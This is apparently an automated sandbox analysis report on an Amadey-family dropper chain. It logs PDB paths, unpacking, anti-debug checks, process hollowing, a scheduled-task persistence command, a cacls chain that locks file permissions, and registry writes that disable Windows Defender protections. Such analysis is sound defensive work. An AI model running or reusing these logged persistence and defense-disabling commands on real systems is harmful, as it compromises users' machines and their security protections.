                            Source: file.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: file.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: file.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: file.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: file.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: Binary string: AC:\jir\banilukulivuj\lagite48_xag84\kukafed\varawayaseyu\36-h.pdb source: bmMg.exe, 00000001.00000003.262109812.0000000004742000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000000.262316550.0000000000401000.00000020.00000001.01000000.00000005.sdmp, amMl.exe.1.dr
                            Source: Binary string: wextract.pdb source: file.exe, bmMg.exe.0.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.261534340.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.261384983.0000000004B55000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe, 0000000F.00000000.400800832.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe, 0000000F.00000003.401064354.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000010.00000002.785330986.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000010.00000000.402691693.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001B.00000000.409509080.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001B.00000002.410333613.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000000.518871560.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000002.519216462.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000023.00000000.645436147.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000023.00000002.646132951.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000024.00000000.774022466.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000024.00000002.774254315.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe.15.dr, xriv.exe.0.dr
                            Source: Binary string: Healer.pdb source: amMl.exe, 00000002.00000002.367490404.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367466670.00000000025B0000.00000004.08000000.00040000.00000000.sdmp, amMl.exe, 00000002.00000002.367279348.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367376734.0000000002350000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: wextract.pdbGCTL source: file.exe, bmMg.exe.0.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bmMg.exe, 00000001.00000003.262236025.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, bmMg.exe, 00000001.00000003.262206496.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, bmMg.exe, 00000001.00000003.262109812.000000000479D000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 0000000E.00000000.368083215.0000000000A02000.00000002.00000001.01000000.00000009.sdmp, nika.exe.1.dr
                            Source: Binary string: _.pdb source: amMl.exe, 00000002.00000002.367490404.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367279348.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367376734.0000000002350000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\jir\banilukulivuj\lagite48_xag84\kukafed\varawayaseyu\36-h.pdb source: bmMg.exe, 00000001.00000003.262109812.0000000004742000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000000.262316550.0000000000401000.00000020.00000001.01000000.00000005.sdmp, amMl.exe.1.dr
                            Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001C.00000002.785642751.000000006F69F000.00000002.00000001.01000000.0000000D.sdmp, clip64.dll.16.dr, clip64[1].dll.16.dr
                            Source: Binary string: Healer.pdbH5 source: amMl.exe, 00000002.00000002.367490404.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367466670.00000000025B0000.00000004.08000000.00040000.00000000.sdmp, amMl.exe, 00000002.00000002.367279348.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367376734.0000000002350000.00000004.08000000.00040000.00000000.sdmp

                            Data Obfuscation

                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Unpacked PE file: 2.2.amMl.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Unpacked PE file: 2.2.amMl.exe.400000.0.unpack .text:ER;.data:W;.gus:R;.dux:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                            Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_011D724D push ecx; ret 0_2_011D7260
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe, Code function: 1_2_00F8724D push ecx; ret 1_2_00F87260
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_00423149 push eax; ret 2_2_00423179
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_004231C8 push eax; ret 2_2_00423179
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_005CC125 push ebx; ret 2_2_005CC126
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_005BE484 push ecx; ret 2_2_005BE497
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_005CBE73 push cs; iretd 2_2_005CBF49
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_005CBF75 push cs; iretd 2_2_005CBF49
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_02394139 push edi; iretd 2_2_0239414E
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Code function: 2_2_0239454E push ecx; retf 2_2_02394554
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Code function: 15_2_011DF748 push E8FFFFFBh; iretd 15_2_011DF74D
                            Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_011D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_011D2F1D
                            Source: nika.exe.1.dr, Static PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                            Source: amMl.exe.1.dr, Static PE information: section name: .gus
                            Source: amMl.exe.1.dr, Static PE information: section name: .dux

                            Persistence and Installation Behavior

                            Source: Yara match, File source: dump.pcap, type: PCAP
                            Source: Yara match, File source: 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match, File source: 00000010.00000002.785793369.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match, File source: 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match, File source: Process Memory Space: mnolyk.exe PID: 4184, type: MEMORYSTR
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, File created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe, File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe, File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll
                            Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_011D1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_011D1AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe, Code function: 1_2_00F81AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00F81AE8

                            Boot Survival

                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe TID: 4084Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 2348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5024Thread sleep count: 128 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5024Thread sleep time: -3840000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4604Thread sleep time: -50000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 3216Thread sleep count: 38 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 3216Thread sleep time: -6840000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5024Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exe TID: 2956Thread sleep count: 164 > 30
                            Source: C:\Windows\SysWOW64\rundll32.exe TID: 2956Thread sleep time: -164000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-25915
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-26002
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2450
                            Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2575
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeAPI coverage: 5.1 %
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 50000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeAPI call chain: ExitProcess graph end nodegraph_2-26004
                            Source: mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                            Source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_011D5467
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_011D2390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00F82390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011EFC58 FindFirstFileExW,15_2_011EFC58
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_011D2F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B092B mov eax, dword ptr fs:[00000030h]2_2_005B092B
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B0D90 mov eax, dword ptr fs:[00000030h]2_2_005B0D90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011EA9A1 mov eax, dword ptr fs:[00000030h]15_2_011EA9A1
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011ECFB2 mov eax, dword ptr fs:[00000030h]15_2_011ECFB2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0040ADB0 GetProcessHeap,HeapFree,2_2_0040ADB0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D6F40 SetUnhandledExceptionFilter,0_2_011D6F40
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_011D6CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F86F40 SetUnhandledExceptionFilter,1_2_00F86F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F86CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00F86CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005BD070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_005BD070
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005BE883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_005BE883
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005C71D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_005C71D1
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005C2658 SetUnhandledExceptionFilter,2_2_005C2658
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011E790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_011E790F
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011EBB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_011EBB20
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011E7208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_011E7208

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011D3740 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,15_2_011D3740
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D18A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_011D18A3
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: GetLocaleInfoA,2_2_00417A20
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: GetLocaleInfoA,2_2_005C7C87
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011E7AFC cpuid 15_2_011E7AFC
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_011D7155
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011F3C76 _free,_free,_free,GetTimeZoneInformation,_free,15_2_011F3C76
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_023996A8 GetUserNameA,2_2_023996A8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_011D2BFB

                            Lowering of HIPS / PFW / Operating System Security Settings

                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

                            Stealing of Sensitive Information

                            Source: Yara matchFile source: 2.2.amMl.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.amMl.exe.5b0e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.amMl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.amMl.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000003.343232585.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 31.2.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.0.xriv.exe.11d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 35.0.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.0.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.2.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.file.exe.4bb4820.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 35.2.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.file.exe.4bb4820.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.0.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.xriv.exe.11d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.0.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.mnolyk.exe.830000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000010.00000000.402656135.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000002.519184660.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000000.518847759.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000002.646081844.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000000.645377200.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.410254197.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
